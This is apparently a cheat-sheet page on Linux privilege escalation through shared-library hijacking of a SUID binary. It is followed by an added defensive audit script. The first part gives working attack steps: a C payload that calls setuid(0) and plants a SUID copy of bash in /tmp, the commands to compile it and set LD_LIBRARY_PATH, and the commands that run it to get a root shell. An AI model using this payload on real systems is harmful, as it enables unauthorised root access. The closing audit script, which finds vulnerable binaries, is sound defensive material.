Escalation with shared libraries



Find files with the SUID or SGID bit set

find / -perm /6000 2>/dev/null

 

Example:

ls -l /usr/local/bin/strange
-rwsr-xr-x 1 root root 8432 Nov 18 2020 /usr/local/bin/strange

 

Execution

/usr/local/bin/strange
/usr/local/bin/strange: error while loading shared libraries: libstrange.so: cannot open shared object file: No such file or directory

 

Debug

ldd /usr/local/bin/strange
strings /usr/local/bin/strange
strace /usr/local/bin/strange
strace /usr/local/bin/strange 2>&1 | grep -i -E "open|access|no such file"

 

Payload

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

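/* Exported symbol: runs only when the SUID binary resolves and calls payload(). */
void payload() {
        /* Make the real UID/GID root as well, so the shell started below stays privileged. */
        setuid(0);
        setgid(0);
        /* Copy bash, set SUID/SGID on the copy, then start it with -p to keep the effective IDs. */
        system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}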

 

Compilation

gcc -shared -fPIC -o /home/john/lib/libstrange.so /home/john/lib/libstrange.c
export LD_LIBRARY_PATH=/home/john/lib:$LD_LIBRARY_PATH

 

Exploitation

/usr/local/bin/strange

 

Escalation

/tmp/bash -p
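
Audit

The check below is an added example, not part of the original page: it reports SUID/SGID binaries that have an unresolved library, or an RPATH/RUNPATH directory a non-root user can write to. glibc ignores LD_LIBRARY_PATH for set-user-ID programs (secure-execution mode), so those are the library search conditions that still apply to such a binary. The function names, the --scan switch and the sample tool output are assumptions made for this example.

```shell
#!/bin/sh
# Added audit example (not from the original page). Assumes GNU/Linux with
# find, ldd, readelf and stat; run as root so every binary is readable.

# Print the libraries that ldd output (stdin) reports as unresolved.
missing_libs() {
    awk '/=> not found/ { print $1 }'
}

# Print each RPATH/RUNPATH directory found in `readelf -d` output (stdin).
# $ORIGIN entries are printed as-is, not expanded.
runpath_dirs() {
    sed -n 's/.*(R\(UN\)\{0,1\}PATH).*\[\(.*\)\]/\2/p' | tr ':' '\n' | sed '/^$/d'
}

# Succeed when owner uid $1 and octal mode $2 let a non-root user write.
unsafe_perms() {
    [ "$1" != 0 ] || [ $(( 0$2 & 022 )) -ne 0 ]
}

# Succeed when a non-root user could plant a file in directory $1. A missing
# directory is judged by its nearest existing ancestor.
unsafe_dir() (
    d=$1
    while [ ! -d "$d" ]; do d=$(dirname "$d"); done
    unsafe_perms "$(stat -c %u "$d")" "$(stat -c %a "$d")"
)

# Report SUID/SGID binaries under $1 with an unresolved library or an unsafe
# RPATH/RUNPATH directory.
audit_suid() {
    find "${1:-/}" -xdev -type f -perm /6000 2>/dev/null | while IFS= read -r bin; do
        ldd "$bin" 2>/dev/null | missing_libs | while IFS= read -r lib; do
            echo "$bin: unresolved library $lib"
        done
        readelf -d "$bin" 2>/dev/null | runpath_dirs | while IFS= read -r dir; do
            if unsafe_dir "$dir"; then echo "$bin: non-root-writable search dir $dir"; fi
        done
    done
}

# Constructed sample tool output (the RUNPATH value is an assumption).
SAMPLE_LDD='	libstrange.so => not found
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f0000000000)'
SAMPLE_DYN=' 0x0000000000000001 (NEEDED)   Shared library: [libstrange.so]
 0x000000000000001d (RUNPATH)  Library runpath: [/home/john/lib:/usr/lib]'

if [ "${1:-}" = --scan ]; then audit_suid "${2:-/}"; fi
```

Run it as root with --scan / to audit the whole filesystem; a finding is cleared by installing the missing library into a root-owned directory or by removing the SUID bit or the writable search path.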